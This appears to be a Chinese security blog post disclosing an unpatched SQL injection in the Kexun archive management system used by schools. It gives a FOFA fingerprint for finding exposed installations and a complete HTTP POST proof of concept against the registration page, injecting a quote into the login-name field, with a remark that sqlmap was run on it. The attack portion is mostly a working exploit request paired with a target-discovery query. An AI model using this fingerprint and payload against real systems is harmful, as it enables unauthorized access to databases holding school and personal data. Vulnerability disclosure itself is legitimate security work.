科讯档案管理系统存在SQL注入漏洞(0day)

马船长2024-08-27 12:44

漏洞描述

安徽科迅教育装备20年来来始终坚持智慧校园集成方案产品的开发和部署应用,我们有完善的智慧校园和数字校园建设方案,根据不同的学校不同的实际情况量身定做系统集成方案。产品主要是为了实现校园的智慧网络、智慧OA、智慧教学、智慧学习、数字医疗、智慧安防、智慧平台、校园一卡通智慧结算等。科讯档案管理系统多接口存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

FOFA:

vbnet 复制代码 
body="安徽省科迅教育装备有限公司 版权所有"

漏洞复现

POC:

php 复制代码 
POST /admin/zhuCe.aspx HTTP/1.1
Host: 
Content-Length: 1276
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Edg/128.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://127.0.0.1/admin/zhuCe.aspx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: Hm_lvt_f8d0a8c400404989e195270b0bbf060a=1722057915,1724161841; ASP.NET_SessionId=cnxjymugm5vz2pewu1wim2i5; CheckCode=2874
Connection: keep-alive

__VIEWSTATE=%2FwEPDwUJOTE2NzUxOTMwD2QWAgIDD2QWAgINDxAPFgYeDURhdGFUZXh0RmllbGQFBE5hbWUeDkRhdGFWYWx1ZUZpZWxkBQJJZB4LXyFEYXRhQm91bmRnZBAVDgnlupPnrqHpg6gP5Lq65Yqb6LWE5rqQ5aSECeWtpueUn%2BWkhA%2Fop4TliJLlj5HlsZXlpIQJ5oub55Sf5aSED%2BWfueiureWwseS4muWkhAnmgLvliqHlpIQP55uR5a%2Bf5a6h6K6h5aSEEuaguOeRnuWKs%2BWKoeWFrOWPuA%2Fln7rnoYDmlZnlrabpg6gP5qC455S15bel56iL57O7GOaVmeiCsuS4juenkeWtpuaKgOacr%2Bezuw%2FkuqTpgJrlt6XnqIvns7sK5YWa5pS%2F5YqeMhUOATEBNgE3ATkCMTACMTECMTICMTMCMTQCMTUCMTYCMTcCMTgCMzAUKwMOZ2dnZ2dnZ2dnZ2dnZ2dkZGRkQ5AxhnFuBQpRovjoynY6l6Jz20JB9%2BK3gZcFAMynfA%3D%3D&__VIEWSTATEGENERATOR=5A8EE21C&__EVENTVALIDATION=%2FwEdABYgUMRUOpnaTvT3MuTcc9EMnIXzDkrCrcbL0RzCfU3JozPzhWZ6gm6le6MUtp6VelIVLCsBEnBJc2CPcvfKwmoXM9KW7XpjHhBuINT5110rU73hoBAJzRZeyqYigwFTnuFy8BGjfquCLoLrVWyeBSOAsjxEOdVYGWgUKkCRqsD%2B8GBeSBtpFcnkARWlh0DiBtTUUI6khBLVHQWydeVVf2Co9CZXvTqeIJBfgJMMaexMGEH3a3QK4%2BERtk5Q60GujGvjgNMYWRz%2BqmMhKoVvbXdgL64n1e00Z3%2BaK3k3w2LHinIdmulgZ3eziAPp0ddszYXSxHrVyknRyG6pkcaz3kGdrnQUC79JcT%2BnHsotSJV5InDCG6sD1npFWRzd77SAvEtqp%2BHgzjKsJIetRcrTTNorOZYVAeSDCngdB4D9FxqIghmk0MkjVEwrXYdpoK2OVqdh2nw8styvTRiSboYiD9A%2BGOzUrqY%2FiCUzL2epOTZ46HlgcfjMYvR73uamwXkck1g%3D&hid_DocumentList=0&hid_type=0&txt_loginName=admin'&txtPwd=1&txtPwd2=1&txt_nickName=1&ddl_bumen=1&btn_save=%E4%BF%9D%E5%AD%98

sqlmap结果:

记录:

看到注册接口我想到的是XSS

尝试注册

猜测用户名带到后端去查询了,尝试sql注入

没过滤非法字符,sqlmap直接跑

相关推荐
TG_yunshuguoji1 天前
阿里云国际代理商:如何实现配置跨区域复制?
安全·阿里云·云计算
kali-Myon1 天前
NewStarCTF2025-Week2-Pwn
算法·安全·gdb·pwn·ctf·栈溢出
胡耀超1 天前
数据安全指南-合规治理 2025 等保2.0测评实施 全球数据保护法规对比 数据分类分级管理 ISO27001与SOC2认证 跨境数据传输合规
安全·数据安全·等保·跨境数据传输合规·数据分类分级管理·等保2.0测评实施·iso27001与soc2认证
腾视科技1 天前
让安全驾驶有“AI”相伴|腾视科技DMS视频监控一体机,守护每一次出行
人工智能·科技·安全
Better Bench1 天前
ubuntu20.04安全的安装可穿墙的远程软件parsec
安全·ubuntu·远程·parsec
德迅云安全-小潘1 天前
蜜罐技术重塑网络安全新格局
安全
缘友一世1 天前
漏洞扫描POC和web漏洞扫描工具
网络·安全·web安全
合作小小程序员小小店2 天前
Web渗透之身份认证与访问控制缺陷(越权(水平垂直),访问控制(没有验证),脆弱验证(Cookie,JWT,Session等))
安全·web安全·网络安全·asp.net·网络攻击模型
2401_885405512 天前
定位守护童年,科技构筑安全屏障
科技·物联网·安全·小程序·宠物·web app·智能手表
newxtc2 天前
【 广州产权交易所-注册安全分析报告-无验证方式导致安全隐患】
开发语言·人工智能·selenium·安全·yolo
热门推荐
01BongoCat - 跨平台键盘猫动画工具02GitHub 镜像站点03两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答04UV安装并设置国内源05Linux下V2Ray安装配置指南06KGG转MP3工具|非KGM文件|解密音频07GitLab 零基础入门指南:从安装到项目管理全流程08荣耀手机2025年10月发布的新品Magic8比起Magic7,在硬件、性能、价格等上有什么区别,有什么优势09windows找不到gpedit.msc(本地组策略编辑器)10在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)